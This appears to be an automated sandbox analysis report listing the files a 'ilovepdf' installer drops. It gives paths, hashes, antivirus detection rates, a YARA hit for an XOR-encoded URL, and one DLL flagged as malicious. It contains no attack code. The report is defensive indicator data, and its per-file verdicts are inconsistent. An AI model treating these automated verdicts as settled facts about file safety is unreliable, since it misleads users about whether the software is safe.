Encrypted: false
SSDEEP: 96:S6xsUwW7fQhpXfowbgIASYwyLEeBFv9lfS4WI9XM7TYVzUBPD/pskUDVERqd/8FI:S6x0h5w9yyL37SwM7TnBbOt2SOI
MD5: 9B1AF1946FA721CE91ECEC1B10F8D843
SHA1: D9D88F38CD261CE62BD54655E157A66282147B95
SHA-256: BF78A435C93B5B0152BCA1F3A44DB2977A8FD03CE41377FFDDF3559B8B6D39AE
SHA-512: 2A3369C58463CF0F4DDFAFBB0A9DC3001AA4563E34330AF1CE71611E865DE3C9AFF1CCB7F5302871C1E830D9A2AB1ACF391920F81B0DC49719681461F25109F7
Malicious: false
                                                                                  Preview: ......Q.CF,.X....i...R.]...s(....9.'..j^...Y$..p..QL.z.X...n.......tM(........woF7.f0.?....t9...Yy9.VZ.dRO~.K.I....p..gC..).e......h..}....(...C..bM....U.}....)..8.........M&..%0(...&..uet%.L.....?.W.W....1I.....Z.M...Z..NcL.F...Ix.a.....x.W-..R .]S..w....C..j.k.O.....}.m.;E&..{....>^....P..:k.S.7@e... .SH..f`.....bs..m..t.o...H..Zm...~....#g;....-..h.B.....MOL.."3gXG.8..Wx.,..j..W.UV.4.H.0.k..U.3c.wf.F.W..1..A..0....q+S....y.c...+.\h.N.......a.......l....oB......|...$.*.\C......./.;=...z..m...=."0j..B....<....h.V.....B..e.@.l..b....Y.W^2M.....zf..D..2T.c..=.bZS..5.5....ky$_F*$V$..l.....'FwU..S.}.../(.......lG;..t#......P".E..'.....wj...8...4...w@K.....W...Q...,>_.&.......b.Q..L.m.>.hm+...J.g%"_jZ.L.r'....U}....[2GJ..)+..K...@.B%.B.N....'U6at....[...S..S..8.t......Q.._..E..\'...u...e...;..0f|."...H.D..+.#....G_.[N.....C*..%..ga...:..m.&....7...D{..}a;....x.|....'.. jU..^.'.l$..........g^p9M.....t...2x....S".5......3.d.5...*...."..K+L
                                                                                  C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2613752
                                                                                  Entropy (8bit):6.715454660240232
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:9ZZ3wvJUUa5ooBLYnx6f8PT+YZtU+kGVSILs62bq9qKJ:N6mUa5xyx1qaU+kGMIXFR
                                                                                  MD5:A68BB111B9DE5443AE19116145289BDA
                                                                                  SHA1:5CD5B056CAF0973ABD680E822F03803002F579D1
                                                                                  SHA-256:DDF297FD3D6992472BEB1EAB3314E4A86223C29BB6945EE11617F003312BF4C7
                                                                                  SHA-512:764B2593056CC1ABA05BD7D52B7EA3C77C5DF3B47C05E27E0CE4DB23F383EB82DB64818308CB9DCE069059C9449C834A5354DB28A2EFF5211B849BFD7BC3AE07
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  C:\Program Files (x86)\ilovepdf\is-005RG.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6728
                                                                                  Entropy (8bit):7.972168290563647
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:S6xsUwW7fQhpXfowbgIASYwyLEeBFv9lfS4WI9XM7TYVzUBPD/pskUDVERqd/8FI:S6x0h5w9yyL37SwM7TnBbOt2SOI
                                                                                  MD5:9B1AF1946FA721CE91ECEC1B10F8D843
                                                                                  SHA1:D9D88F38CD261CE62BD54655E157A66282147B95
                                                                                  SHA-256:BF78A435C93B5B0152BCA1F3A44DB2977A8FD03CE41377FFDDF3559B8B6D39AE
                                                                                  SHA-512:2A3369C58463CF0F4DDFAFBB0A9DC3001AA4563E34330AF1CE71611E865DE3C9AFF1CCB7F5302871C1E830D9A2AB1ACF391920F81B0DC49719681461F25109F7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):921600
                                                                                  Entropy (8bit):7.929650404687928
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:9MIjKyNtCBdD3dMJ5QXWdWN2n3ROQ94EnNyYSsjHGHTnFha3sIvx7D+IE4uBwL8i:9fCXdwQGh74EniLHa3z5eaLo0L9K
                                                                                  MD5:814EF2BDB0199A7B950E3ECB650E9E29
                                                                                  SHA1:89460EE7A16E6682721E1C59D194DFBE05D35FD1
                                                                                  SHA-256:6F7D45E4ABEE103049E50E8BF9AB3E36B9C0D5044FDAB3B1B37766017ED5E4DF
                                                                                  SHA-512:90E082F14F677CC7C34D7F71623E9C86084E714F288F941C6603CE63DD2AA28A6B16959E5B3E9F849BFC0A82A6F8F9AC5F7D64E28AF310E373BF8ADD3610281E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):706560
                                                                                  Entropy (8bit):7.921985342568425
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:h+7aMyDxl1EputZ69u+sC4pdFANpBnNw7AMoFg8gb+CdofxMtauAjAMmyEDYHg36:hrVl1EpsZqQdSNpBnW7tPJeAlDYIqpv
                                                                                  MD5:19C9680AC9642A8105096ED9C1C5C71C
                                                                                  SHA1:1B4D55F5D372AB0E7532E2F4613BA1B767B4AC80
                                                                                  SHA-256:ABBFC12837B138DA3DC66D5D6032D1183FC947FBEEC22DF0EC71B6120FC1B769
                                                                                  SHA-512:2BCE8C3F3260E28D0B807C7EB1C1B271904FE45AE2D5366C47F6C72C13E070D40E1D5C6C00D37967DA0C33E3408CFDF6F23AFAC3975C8817030CF90F9355DC55
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):1209344
                                                                                  Entropy (8bit):7.922981354856275
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ngTRboPdLcaUHa3XRIXmpTpoCenCZjMRHIpU8OKhT6ZbKoD97ST5S0LX/68cBDk:nuo1LcFis8pSgUR4CuI97sS07/Nww
                                                                                  MD5:B4BFDBB19C4E1A089F51577D193A9F42
                                                                                  SHA1:3E6B4C547289BD39A84CD7A73A8FCFDF72C0C442
                                                                                  SHA-256:8549924223C77E4C52EC83E4BC2845FA9F7C571934423C27CA0D4BFED0EEB451
                                                                                  SHA-512:0D85E0AC1D65A92083523C32F275BBF40D1380B608551DACFA41037691FCE230FF1D6AF3E3B263BCC274D7C935581B0328563627A9D7EBFDE14B6E85F56416B4
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, Author: Florian Roth
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2613752
                                                                                  Entropy (8bit):6.715454660240232
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:9ZZ3wvJUUa5ooBLYnx6f8PT+YZtU+kGVSILs62bq9qKJ:N6mUa5xyx1qaU+kGMIXFR
                                                                                  MD5:A68BB111B9DE5443AE19116145289BDA
                                                                                  SHA1:5CD5B056CAF0973ABD680E822F03803002F579D1
                                                                                  SHA-256:DDF297FD3D6992472BEB1EAB3314E4A86223C29BB6945EE11617F003312BF4C7
                                                                                  SHA-512:764B2593056CC1ABA05BD7D52B7EA3C77C5DF3B47C05E27E0CE4DB23F383EB82DB64818308CB9DCE069059C9449C834A5354DB28A2EFF5211B849BFD7BC3AE07
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-DKEKO.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):571917
                                                                                  Entropy (8bit):7.966052994665358
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/HegB06gEPizUsFEjR79m3qMkrnkIClgWoZmGjKo2Dt5psSjd:/+i06g8oUsFElpm3dw1ClFrg2Dt59d
                                                                                  MD5:BDE9F29D164449ADA1DF3BECD54E4337
                                                                                  SHA1:F104C62DE429CF02A3DFEE203122BD6FDE88B1F3
                                                                                  SHA-256:634DD50A6002D5E328D595E04C16B88D351AB7577C25C8FA674420D9BB57D896
                                                                                  SHA-512:7AA0B7E47DFA4FE25E9FF613865AE35DA00D6651BDA27A6B4F7DD30E6A6ABFB66B5BD2C7C9A5C9871DBBCE30CAA24CE885C3650DC2D860A60E09D33113449C25
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-IDUEM.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):178
                                                                                  Entropy (8bit):5.200654239805503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cFfdXP+FFFKMlFsPR4GXXyWRXlQFSLKbFUuAvF9IZZDKh+sWGXViKWVV9uMv:iV2FFFKMfsp7i22SLKbFUPvYWhpBFiZz
                                                                                  MD5:23872B81B308F0615E32E9EC60B8F806
                                                                                  SHA1:3989CA350F25FA4703573AD07AFBE99DECA43C98
                                                                                  SHA-256:BC528E642062193291745A32FFDF899BF420F556562BF18774B67615DF2A56E2
                                                                                  SHA-512:6357529877B355F724D390117FE19250344B7322098476D30F50D59381956345189E26DCB6618E610F0755C4C9819CAAC5D1323C82F3936FA028D7F3198C3A20
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <current Dat="1351852478" />.. <Dat Txt="&#x0A;What&apos;s New: We are waiting for your feedbacks -&gt; ||&#x0A;http://unipdf.com/support/&#x0A;" />..</config>..
                                                                                  C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3038269
                                                                                  Entropy (8bit):6.3798753919324795
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:nLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu/:FwSi0b67zeCzt0+yO3kSs
                                                                                  MD5:F6783D6BAD48D0F022DDB2C0A5819087
                                                                                  SHA1:FD1E4D2EBCC11D98ADAA75797527BA7E8DA5DC59
                                                                                  SHA-256:DAFBDF676A506C8743F4A93E81C927075101A172CBB8B3E8BCCF867D4D270B2B
                                                                                  SHA-512:67C53D7F3A0190E7A9B3FAD2B6E404EF7E0D67536210561B23F98C16C3EA4E4CEFEC8FF475FE318AA5C7466554E349ED5A6E5897576520A490346E7DAF02800A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-RD093.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):86057
                                                                                  Entropy (8bit):5.650674653880301
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RxBKLWBVtFt475GbZj30O7CXBCZSCfo4nfKTbvAbFTggiHdtz2SkZSvNc/YM/tdI:R7e2wlTbYbF24iZFazDIMv9AV
                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\is-TSARV.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):484
                                                                                  Entropy (8bit):3.262742514495205
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:fI+PciIrJRFWEXoPcZ0qLJxpPcZ0qm/LVpPcZ0qHJxpPcZ0qc/8Xn+PcoINJRFOy:pSJRRBNaE/LsBa+/G1JREovn
                                                                                  MD5:147C02BD59F90777A43F77C711145711
                                                                                  SHA1:299BC5A77CF4BB06FE123F70FC1EC643ECA6FCC2
                                                                                  SHA-256:F7077388D0CC1928FA1759C91A5396D87D282A78843F1330456FB3809C2E12FA
                                                                                  SHA-512:7A274D979C67437C9CD4148C85C7FBC62D2DEFF26E730158D93F3EBF3B89A070A415305DC708FBE9991EF0BB0C870D13518887E17DCF937C54A7F6AFF83A8D97
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: #-------------------2021-10-11 19:01:13-------------------#program start..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary th.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary ti.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tt.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tw.dll Error:126..#-------------------2021-10-11 19:01:17-------------------#program end..
                                                                                  C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\is-VCRNI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):288
                                                                                  Entropy (8bit):4.155730210419504
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iNofEsshqwofAhd/2vWOZCvRSaubS8JvObSyo8du:i6fdso9wl2vhZ+RSdOYmO78du
                                                                                  MD5:B5D5DA176844BFE5FA47A1727E7CB8BC
                                                                                  SHA1:A7B7EE512E6DBC46603CD7830152C69D39D2CACB
                                                                                  SHA-256:FC0D68DD98F86BEA1B9699424FCE2C5F747E31419451404E9A9B83ED13394D42
                                                                                  SHA-512:BC1A5D218DA9D6BE1CACF237C522D98190C76C946A080F3555B94217EBA112A1995D3AB4710D605937171C3A7D85B28FA874C699B00EB367BACC6E5241CA5503
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <UserDefine>.. <Language ID="0" />.. <Path PathSet="2" Path="" />.. <ImageFormat set="2" />.. <Res set="96" />.. <bit set="24" />.. <Prefix set="" />.. <Doc set="1" />.. <Help set="1" />.. </UserDefine>..</config>..
                                                                                  C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 9%
                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\language.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):86057
                                                                                  Entropy (8bit):5.650674653880301
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RxBKLWBVtFt475GbZj30O7CXBCZSCfo4nfKTbvAbFTggiHdtz2SkZSvNc/YM/tdI:R7e2wlTbYbF24iZFazDIMv9AV
                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dat (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):571917
                                                                                  Entropy (8bit):7.966052994665358
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/HegB06gEPizUsFEjR79m3qMkrnkIClgWoZmGjKo2Dt5psSjd:/+i06g8oUsFElpm3dw1ClFrg2Dt59d
                                                                                  MD5:BDE9F29D164449ADA1DF3BECD54E4337
                                                                                  SHA1:F104C62DE429CF02A3DFEE203122BD6FDE88B1F3
                                                                                  SHA-256:634DD50A6002D5E328D595E04C16B88D351AB7577C25C8FA674420D9BB57D896
                                                                                  SHA-512:7AA0B7E47DFA4FE25E9FF613865AE35DA00D6651BDA27A6B4F7DD30E6A6ABFB66B5BD2C7C9A5C9871DBBCE30CAA24CE885C3650DC2D860A60E09D33113449C25
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\th.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\ti.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):706560
                                                                                  Entropy (8bit):7.921985342568425
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:h+7aMyDxl1EputZ69u+sC4pdFANpBnNw7AMoFg8gb+CdofxMtauAjAMmyEDYHg36:hrVl1EpsZqQdSNpBnW7tPJeAlDYIqpv
                                                                                  MD5:19C9680AC9642A8105096ED9C1C5C71C
                                                                                  SHA1:1B4D55F5D372AB0E7532E2F4613BA1B767B4AC80
                                                                                  SHA-256:ABBFC12837B138DA3DC66D5D6032D1183FC947FBEEC22DF0EC71B6120FC1B769
                                                                                  SHA-512:2BCE8C3F3260E28D0B807C7EB1C1B271904FE45AE2D5366C47F6C72C13E070D40E1D5C6C00D37967DA0C33E3408CFDF6F23AFAC3975C8817030CF90F9355DC55
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\tt.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):921600
                                                                                  Entropy (8bit):7.929650404687928
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:9MIjKyNtCBdD3dMJ5QXWdWN2n3ROQ94EnNyYSsjHGHTnFha3sIvx7D+IE4uBwL8i:9fCXdwQGh74EniLHa3z5eaLo0L9K
                                                                                  MD5:814EF2BDB0199A7B950E3ECB650E9E29
                                                                                  SHA1:89460EE7A16E6682721E1C59D194DFBE05D35FD1
                                                                                  SHA-256:6F7D45E4ABEE103049E50E8BF9AB3E36B9C0D5044FDAB3B1B37766017ED5E4DF
                                                                                  SHA-512:90E082F14F677CC7C34D7F71623E9C86084E714F288F941C6603CE63DD2AA28A6B16959E5B3E9F849BFC0A82A6F8F9AC5F7D64E28AF310E373BF8ADD3610281E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):1209344
                                                                                  Entropy (8bit):7.922981354856275
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ngTRboPdLcaUHa3XRIXmpTpoCenCZjMRHIpU8OKhT6ZbKoD97ST5S0LX/68cBDk:nuo1LcFis8pSgUR4CuI97sS07/Nww
                                                                                  MD5:B4BFDBB19C4E1A089F51577D193A9F42
                                                                                  SHA1:3E6B4C547289BD39A84CD7A73A8FCFDF72C0C442
                                                                                  SHA-256:8549924223C77E4C52EC83E4BC2845FA9F7C571934423C27CA0D4BFED0EEB451
                                                                                  SHA-512:0D85E0AC1D65A92083523C32F275BBF40D1380B608551DACFA41037691FCE230FF1D6AF3E3B263BCC274D7C935581B0328563627A9D7EBFDE14B6E85F56416B4
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\unins000.dat
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2951
                                                                                  Entropy (8bit):3.4119433710230496
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:kxe5dyXdKrCy7d/didKdnudSdpUdjdVdQdtdVdNrCyrrCy4gNmMxeUhiwM4:kMuSCCRfCwCtJMHhiwM4
                                                                                  MD5:011C210BE28283E0C800446501515FF0
                                                                                  SHA1:11006311AD1D2E9A2F91EB5B946D390B7D435DFF
                                                                                  SHA-256:0AEE628B7EEEED16D39E22EB2B7CDEFDD2D9EAC7EDC83288AC3B805A71069BB3
                                                                                  SHA-512:AE15B20C9747045568920A09C5BDE0966D23EE94DD74F717A0D731D2196D283CFC1BCF1DE40FE77AA6A225800595D7B2CA6B634B075D88B480D35934841BD75D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
